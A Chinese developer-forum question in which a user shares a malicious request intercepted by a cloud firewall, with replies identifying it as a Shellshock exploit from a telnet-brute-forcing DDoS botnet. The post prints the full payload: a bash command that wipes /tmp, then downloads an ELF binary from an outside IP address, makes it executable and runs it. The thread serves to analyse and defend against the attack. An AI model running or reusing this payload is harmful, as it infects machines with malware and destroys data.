开发者社区> 问答> 正文

云盾截获一个恶意请求,各位是否有兴趣分析一下? 400 请求报错 

42.96.xxx.xxx/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -o /tmp/china.z-pobr >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-pobr >> /tmp/run.sh;echo /tmp/china.z-pobr >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh. 

下载出来的"java"文件是个ELF

展开
收起
kun坤 2020-05-28 16:04:36 405 0
1 条回答
写回答
取消 提交回答
  • 小白看不懂是什么######shell破壳攻击######具体里面执行了一些什么,如何得知?######写了个脚本/tmp/run.sh,到你的系统,,脚本内容时从http://61.160.212.172:911下载个ELF文件,更改权限并执行,,,其实你可以手动把那个文件下下来分析一下,不执行就好######这个http://61.160.212.172:911/网页可以打开!###### 基于shellshock和telnet弱口令破解的僵尸网络.
    主要穷举telnet若口令,然后远程下载木马,执行后telnet&DDOS其他ip

    2020-05-29 13:06:02
    赞同 展开评论 打赏
问答地址:
问答排行榜
最热
最新

相关电子书

更多
如何产生威胁情报-高级恶意攻击案例分析 立即下载
微信客户端怎样应对弱网络 立即下载
低代码开发师(初级)实战教程 立即下载